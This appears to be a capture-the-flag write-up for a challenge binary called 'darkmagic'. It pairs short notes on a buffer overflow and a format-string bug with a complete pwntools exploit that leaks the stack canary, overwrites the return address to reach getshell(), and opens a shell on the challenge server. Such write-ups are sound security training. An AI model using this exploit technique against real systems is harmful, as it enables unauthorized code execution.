Binary
darkmagic
Notes
- BoF in vuln()
- There is a stack canary
- no-pie
- for loop that reads twice and calls printf twice
- format-string vulnerability in the printf call
vuln()
Steps
- Use the BoF to overwrite max_cntr from 1 to 0xa so that the read/printf loop runs multiple times
- Leak the stack canary using the format-string vuln
- Use the BoF to overwrite the stack canary with the correct value and take control of the PC
- Create a ROP chain that jumps to getshell()
POC
from pwn import *
is_local = False

# Open the I/O channel: a PTY-backed local process when testing offline,
# otherwise a TCP connection to the challenge host.
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
if is_local:
    io = process(
        'pwn_darkmagic_darkmagic',
        stdin=process.PTY,
        stdout=process.PTY,
    )
    # Debugger hook kept for local runs; the breakpoint is the author's.
    # gdb.attach(io, '''
    # b *0x4007eb
    # ''')
else:
    io = remote("35.234.65.24", 30750)
def send_magic(msg_1: bytes, msg_2: bytes):
    """Write two newline-terminated lines to the target, in order.

    The notes above describe the binary's loop as reading two inputs per
    iteration; this helper feeds exactly one such pair.

    Args:
        msg_1: First line sent to the target.
        msg_2: Second line sent to the target.
    """
    for line in (msg_1, msg_2):
        io.sendline(line)
# Offset 16
def leak_stack(depth: int = 0x10):
    """Debug helper: read `depth` stack words through the format string and log them.

    Sends `depth` copies of `%p,` as the first input (second input empty),
    splits the echoed line on commas, and logs each value with its 1-based
    position. Not invoked by the script itself; kept for debugging.

    Args:
        depth: Number of `%p` conversions to request.
    """
    probe = b'%p,' * depth
    send_magic(probe, '')
    words = io.recvline().split(b',')
    io.clean()
    for position, word in enumerate(words, start=1):
        log.info(f'offset: {position} @ {word}')
# --- Exploit sequence; the reasoning for each step is in the notes above ---

# Wait for the banner before sending anything.
io.recvuntil('Dark Magic is here!\n')

# Step 1: overflow that rewrites the loop bound (max_cntr) in vuln() with
# 0xa (little-endian, 4 bytes) so the read/printf loop runs several more
# times. The 100-byte pad is the author's offset.
send_magic(b'A' * 100 + b'\x0a\x00\x00\x00', '')
sleep(1)
io.clean()
sleep(1)

# Step 2: read the canary back through the format string. Direct-parameter
# index 35 is the author's value (leak_stack above is the helper for
# inspecting such offsets).
send_magic(b'%35$p', '')
canary_line = io.recvline()
canary = int(canary_line[:-1], 16)  # drop the trailing newline before parsing hex
log.info(f'Canary: {hex(canary)}')
io.clean()
sleep(1)

# Step 3: rebuild the frame with the leaked canary in place, 8 further pad
# bytes, then the return address replaced by getshell() (0x40073b; the
# binary is no-PIE per the notes).
pad_to_canary = b'A' * 0xd8
pad_to_ret = b'A' * 0x8
getshell_addr = p64(0x40073b)
payload_1 = b''.join((pad_to_canary, p64(canary), pad_to_ret, getshell_addr))
sleep(1)
send_magic(payload_1, '')
io.interactive()